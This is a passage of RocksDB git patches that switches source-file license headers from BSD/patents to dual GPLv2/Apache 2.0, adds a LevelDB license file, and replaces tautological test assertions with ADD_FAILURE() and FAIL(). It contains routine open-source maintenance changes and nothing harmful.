+++ b/utilities/simulator_cache/sim_cache.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include "rocksdb/utilities/sim_cache.h"
 #include
diff --git a/utilities/simulator_cache/sim_cache_test.cc b/utilities/simulator_cache/sim_cache_test.cc
index deaedb1a80f..01b328c783e 100644
--- a/utilities/simulator_cache/sim_cache_test.cc
+++ b/utilities/simulator_cache/sim_cache_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include "rocksdb/utilities/sim_cache.h"
 #include
diff --git a/utilities/spatialdb/spatial_db.cc b/utilities/spatialdb/spatial_db.cc
index 5d7c58fd00a..539ddd06ee0 100644
--- a/utilities/spatialdb/spatial_db.cc
+++ b/utilities/spatialdb/spatial_db.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
diff --git a/utilities/spatialdb/spatial_db_test.cc b/utilities/spatialdb/spatial_db_test.cc
index 74ac48dca93..7e0d67489f5 100644
--- a/utilities/spatialdb/spatial_db_test.cc
+++ b/utilities/spatialdb/spatial_db_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
diff --git a/utilities/spatialdb/utils.h b/utilities/spatialdb/utils.h
index 00160ebe06f..fe4b4e25321 100644
--- a/utilities/spatialdb/utils.h
+++ b/utilities/spatialdb/utils.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
 #include
diff --git a/utilities/table_properties_collectors/compact_on_deletion_collector.cc b/utilities/table_properties_collectors/compact_on_deletion_collector.cc
index 9905d237b1b..304cdfff889 100644
--- a/utilities/table_properties_collectors/compact_on_deletion_collector.cc
+++ b/utilities/table_properties_collectors/compact_on_deletion_collector.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
 #include "utilities/table_properties_collectors/compact_on_deletion_collector.h"
diff --git a/utilities/table_properties_collectors/compact_on_deletion_collector.h b/utilities/table_properties_collectors/compact_on_deletion_collector.h
index 6e21001bf50..bd240e5170d 100644
--- a/utilities/table_properties_collectors/compact_on_deletion_collector.h
+++ b/utilities/table_properties_collectors/compact_on_deletion_collector.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
diff --git a/utilities/table_properties_collectors/compact_on_deletion_collector_test.cc b/utilities/table_properties_collectors/compact_on_deletion_collector_test.cc
index d6c5ece2d6b..3c946bf414f 100644
--- a/utilities/table_properties_collectors/compact_on_deletion_collector_test.cc
+++ b/utilities/table_properties_collectors/compact_on_deletion_collector_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/utilities/transactions/optimistic_transaction_db_impl.cc b/utilities/transactions/optimistic_transaction_db_impl.cc
index 184671e56df..001ebefe1f3 100644
--- a/utilities/transactions/optimistic_transaction_db_impl.cc
+++ b/utilities/transactions/optimistic_transaction_db_impl.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/utilities/transactions/optimistic_transaction_db_impl.h b/utilities/transactions/optimistic_transaction_db_impl.h index 5721e499e51..48f83805771 100644 --- a/utilities/transactions/optimistic_transaction_db_impl.h +++ b/utilities/transactions/optimistic_transaction_db_impl.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #ifndef ROCKSDB_LITE diff --git a/utilities/transactions/optimistic_transaction_impl.cc b/utilities/transactions/optimistic_transaction_impl.cc index f373c7b7d3f..5652189bc35 100644 --- a/utilities/transactions/optimistic_transaction_impl.cc +++ b/utilities/transactions/optimistic_transaction_impl.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/utilities/transactions/optimistic_transaction_impl.h b/utilities/transactions/optimistic_transaction_impl.h index f8c98e1e232..6baec6962ec 100644 --- a/utilities/transactions/optimistic_transaction_impl.h +++ b/utilities/transactions/optimistic_transaction_impl.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/utilities/transactions/optimistic_transaction_test.cc b/utilities/transactions/optimistic_transaction_test.cc index c708163f4ca..f627f0e0955 100644 --- a/utilities/transactions/optimistic_transaction_test.cc +++ b/utilities/transactions/optimistic_transaction_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. 
-// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/utilities/transactions/transaction_base.cc b/utilities/transactions/transaction_base.cc index 0042649ad10..0357c113f23 100644 --- a/utilities/transactions/transaction_base.cc +++ b/utilities/transactions/transaction_base.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/utilities/transactions/transaction_base.h b/utilities/transactions/transaction_base.h index b1b8c02db2f..1514836489e 100644 --- a/utilities/transactions/transaction_base.h +++ b/utilities/transactions/transaction_base.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/utilities/transactions/transaction_db_impl.cc b/utilities/transactions/transaction_db_impl.cc index 6eb0d22f4eb..2c425dd8d66 100644 --- a/utilities/transactions/transaction_db_impl.cc +++ b/utilities/transactions/transaction_db_impl.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/utilities/transactions/transaction_db_impl.h b/utilities/transactions/transaction_db_impl.h index c1e50deafc5..428512e8246 100644 --- a/utilities/transactions/transaction_db_impl.h +++ b/utilities/transactions/transaction_db_impl.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. 
+// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #ifndef ROCKSDB_LITE diff --git a/utilities/transactions/transaction_db_mutex_impl.cc b/utilities/transactions/transaction_db_mutex_impl.cc index 603d1b2e44c..b6120a1688b 100644 --- a/utilities/transactions/transaction_db_mutex_impl.cc +++ b/utilities/transactions/transaction_db_mutex_impl.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/utilities/transactions/transaction_db_mutex_impl.h b/utilities/transactions/transaction_db_mutex_impl.h index ded2c0fe96a..2cce05ba049 100644 --- a/utilities/transactions/transaction_db_mutex_impl.h +++ b/utilities/transactions/transaction_db_mutex_impl.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #ifndef ROCKSDB_LITE diff --git a/utilities/transactions/transaction_impl.cc b/utilities/transactions/transaction_impl.cc index b848b1be20b..408b15bcd3d 100644 --- a/utilities/transactions/transaction_impl.cc +++ b/utilities/transactions/transaction_impl.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/utilities/transactions/transaction_impl.h b/utilities/transactions/transaction_impl.h index 0ffcbf9b59b..01f8f4b2a2d 100644 --- a/utilities/transactions/transaction_impl.h +++ b/utilities/transactions/transaction_impl.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. 
+// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/utilities/transactions/transaction_lock_mgr.cc b/utilities/transactions/transaction_lock_mgr.cc index 487e614dbf1..a10aec17d7b 100644 --- a/utilities/transactions/transaction_lock_mgr.cc +++ b/utilities/transactions/transaction_lock_mgr.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/utilities/transactions/transaction_lock_mgr.h b/utilities/transactions/transaction_lock_mgr.h index e6d623cd096..6389f8d7d3d 100644 --- a/utilities/transactions/transaction_lock_mgr.h +++ b/utilities/transactions/transaction_lock_mgr.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #ifndef ROCKSDB_LITE diff --git a/utilities/transactions/transaction_test.cc b/utilities/transactions/transaction_test.cc index 5abe23cdb15..90cec396b40 100644 --- a/utilities/transactions/transaction_test.cc +++ b/utilities/transactions/transaction_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/utilities/transactions/transaction_util.cc b/utilities/transactions/transaction_util.cc index 63e5b3af647..ad03a94320f 100644 --- a/utilities/transactions/transaction_util.cc +++ b/utilities/transactions/transaction_util.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. 
-// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/utilities/transactions/transaction_util.h b/utilities/transactions/transaction_util.h index 8dea428bf8d..5c6b8fa490a 100644 --- a/utilities/transactions/transaction_util.h +++ b/utilities/transactions/transaction_util.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/utilities/util_merge_operators_test.cc b/utilities/util_merge_operators_test.cc index fe320ede797..d8b3cfba69c 100644 --- a/utilities/util_merge_operators_test.cc +++ b/utilities/util_merge_operators_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "util/testharness.h" #include "util/testutil.h" diff --git a/utilities/write_batch_with_index/write_batch_with_index.cc b/utilities/write_batch_with_index/write_batch_with_index.cc index 9a8e5db78f2..dc5d0fcf60f 100644 --- a/utilities/write_batch_with_index/write_batch_with_index.cc +++ b/utilities/write_batch_with_index/write_batch_with_index.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/utilities/write_batch_with_index/write_batch_with_index_internal.cc b/utilities/write_batch_with_index/write_batch_with_index_internal.cc index f5d0b0e48c3..385d16fe695 100644 --- a/utilities/write_batch_with_index/write_batch_with_index_internal.cc +++ b/utilities/write_batch_with_index/write_batch_with_index_internal.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. 
An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/utilities/write_batch_with_index/write_batch_with_index_internal.h b/utilities/write_batch_with_index/write_batch_with_index_internal.h index f8bc5869a64..ac20f1b862e 100644 --- a/utilities/write_batch_with_index/write_batch_with_index_internal.h +++ b/utilities/write_batch_with_index/write_batch_with_index_internal.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #ifndef ROCKSDB_LITE diff --git a/utilities/write_batch_with_index/write_batch_with_index_test.cc b/utilities/write_batch_with_index/write_batch_with_index_test.cc index ff2468afa69..5b1250a6431 100644 --- a/utilities/write_batch_with_index/write_batch_with_index_test.cc +++ b/utilities/write_batch_with_index/write_batch_with_index_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be From a7321fc97fc645585868642c7cb55b0eb5d8e5b8 Mon Sep 17 00:00:00 2001 From: Siying Dong Date: Sun, 16 Jul 2017 15:50:14 -0700 Subject: [PATCH 002/205] Remove the licensing description in CONTRIBUTING.md Summary: Closes https://github.com/facebook/rocksdb/pull/2590 Differential Revision: D5432539 Pulled By: siying fbshipit-source-id: 49902453bba3c95c1fb8354441b2198649e52bf4 --- CONTRIBUTING.md | 5 ----- 1 file changed, 5 deletions(-) diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index d6467fe07b1..b8b1a412e30 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -12,8 +12,3 @@ Complete your CLA here: If you prefer to sign a paper copy, we can send you a PDF. Send us an e-mail or create a new github issue to request the CLA in PDF format. - -## License - -By contributing to RocksDB, you agree that your contributions will be -licensed under the [BSD License](LICENSE). 
From 4a2e4891fe4c6f66fb9e8e2d29b04f46ee702b52 Mon Sep 17 00:00:00 2001 From: Siying Dong Date: Sun, 16 Jul 2017 18:35:39 -0700 Subject: [PATCH 003/205] Add back the LevelDB license file Summary: Closes https://github.com/facebook/rocksdb/pull/2591 Differential Revision: D5432696 Pulled By: siying fbshipit-source-id: a613230ab916de0b279a65ef429ede65460a8db2 --- LICENSE.leveldb | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 LICENSE.leveldb diff --git a/LICENSE.leveldb b/LICENSE.leveldb new file mode 100644 index 00000000000..7108b0bfba7 --- /dev/null +++ b/LICENSE.leveldb @@ -0,0 +1,29 @@ +This contains code that is from LevelDB, and that code is under the following license: + +Copyright (c) 2011 The LevelDB Authors. All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are +met: + + * Redistributions of source code must retain the above copyright +notice, this list of conditions and the following disclaimer. + * Redistributions in binary form must reproduce the above +copyright notice, this list of conditions and the following disclaimer +in the documentation and/or other materials provided with the +distribution. + * Neither the name of Google Inc. nor the names of its +contributors may be used to endorse or promote products derived from +this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR +A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT +OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, +SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT +LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, +DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY +THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT +(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. From f1a056e0054fbf2dfceed68b7672240e49ca8ff1 Mon Sep 17 00:00:00 2001 From: Yedidya Feldblum Date: Sun, 16 Jul 2017 21:23:33 -0700 Subject: [PATCH 004/205] CodeMod: Prefer ADD_FAILURE() over EXPECT_TRUE(false), et cetera Summary: CodeMod: Prefer `ADD_FAILURE()` over `EXPECT_TRUE(false)`, et cetera. The tautologically-conditioned and tautologically-contradicted boolean expectations/assertions have better alternatives: unconditional passes and failures. 
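As an illustration (not part of the patch; the test name is made up for the sketch), the codemod rewrites test code along these lines, using GoogleTest's ADD_FAILURE() and FAIL() macros; the sketch fails by construction, which is the point:

#include <gtest/gtest.h>

// Sketch of the rewrite: tautological assertions become unconditional
// failure macros that state the intent directly.
TEST(CodemodSketch, UnconditionalFailures) {
  // Before: EXPECT_TRUE(false);  After:
  ADD_FAILURE() << "records a non-fatal failure and keeps running";
  // Before: ASSERT_TRUE(false);  After:
  FAIL() << "records a fatal failure and returns from the test body";
}

Note that FAIL() expands to a return statement, so it is only usable in functions returning void; that is one reason ADD_FAILURE() is the drop-in choice inside the callbacks below that return a Status.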
Reviewed By: Orvid Differential Revision: D5432398 Tags: codemod, codemod-opensource fbshipit-source-id: d16b447e8696a6feaa94b41199f5052226ef6914 --- db/corruption_test.cc | 4 ++-- db/db_block_cache_test.cc | 4 ++-- db/write_batch_test.cc | 16 ++++++++-------- table/mock_table.cc | 2 +- util/thread_local_test.cc | 2 +- utilities/backupable/backupable_db_test.cc | 2 +- utilities/checkpoint/checkpoint_test.cc | 2 +- utilities/lua/rocks_lua_test.cc | 2 +- .../persistent_cache/persistent_cache_test.cc | 4 ++-- utilities/transactions/transaction_test.cc | 6 +++--- utilities/ttl/ttl_test.cc | 12 ++++++------ 11 files changed, 28 insertions(+), 28 deletions(-) diff --git a/db/corruption_test.cc b/db/corruption_test.cc index f9ab8302c0a..9f423757959 100644 --- a/db/corruption_test.cc +++ b/db/corruption_test.cc @@ -152,7 +152,7 @@ class CorruptionTest : public testing::Test { struct stat sbuf; if (stat(fname.c_str(), &sbuf) != 0) { const char* msg = strerror(errno); - ASSERT_TRUE(false) << fname << ": " << msg; + FAIL() << fname << ": " << msg; } if (offset < 0) { @@ -213,7 +213,7 @@ class CorruptionTest : public testing::Test { return; } } - ASSERT_TRUE(false) << "no file found at level"; + FAIL() << "no file found at level"; } diff --git a/db/db_block_cache_test.cc b/db/db_block_cache_test.cc index 317597cb637..169cadc85c3 100644 --- a/db/db_block_cache_test.cc +++ b/db/db_block_cache_test.cc @@ -497,7 +497,7 @@ TEST_F(DBBlockCacheTest, CompressedCache) { options.compression = kNoCompression; break; default: - ASSERT_TRUE(false); + FAIL(); } CreateAndReopenWithCF({"pikachu"}, options); // default column family doesn't have block cache @@ -560,7 +560,7 @@ TEST_F(DBBlockCacheTest, CompressedCache) { ASSERT_EQ(TestGetTickerCount(options, BLOCK_CACHE_COMPRESSED_HIT), 0); break; default: - ASSERT_TRUE(false); + FAIL(); } options.create_if_missing = true; diff --git a/db/write_batch_test.cc b/db/write_batch_test.cc index 388155b6384..4fd156d9bae 100644 --- a/db/write_batch_test.cc +++ b/db/write_batch_test.cc @@ -451,20 +451,20 @@ TEST_F(WriteBatchTest, DISABLED_ManyUpdates) { } virtual Status DeleteCF(uint32_t column_family_id, const Slice& key) override { - EXPECT_TRUE(false); + ADD_FAILURE(); return Status::OK(); } virtual Status SingleDeleteCF(uint32_t column_family_id, const Slice& key) override { - EXPECT_TRUE(false); + ADD_FAILURE(); return Status::OK(); } virtual Status MergeCF(uint32_t column_family_id, const Slice& key, const Slice& value) override { - EXPECT_TRUE(false); + ADD_FAILURE(); return Status::OK(); } - virtual void LogData(const Slice& blob) override { EXPECT_TRUE(false); } + virtual void LogData(const Slice& blob) override { ADD_FAILURE(); } virtual bool Continue() override { return num_seen < kNumUpdates; } } handler; @@ -502,20 +502,20 @@ TEST_F(WriteBatchTest, DISABLED_LargeKeyValue) { } virtual Status DeleteCF(uint32_t column_family_id, const Slice& key) override { - EXPECT_TRUE(false); + ADD_FAILURE(); return Status::OK(); } virtual Status SingleDeleteCF(uint32_t column_family_id, const Slice& key) override { - EXPECT_TRUE(false); + ADD_FAILURE(); return Status::OK(); } virtual Status MergeCF(uint32_t column_family_id, const Slice& key, const Slice& value) override { - EXPECT_TRUE(false); + ADD_FAILURE(); return Status::OK(); } - virtual void LogData(const Slice& blob) override { EXPECT_TRUE(false); } + virtual void LogData(const Slice& blob) override { ADD_FAILURE(); } virtual bool Continue() override { return num_seen < 2; } } handler; diff --git a/table/mock_table.cc 
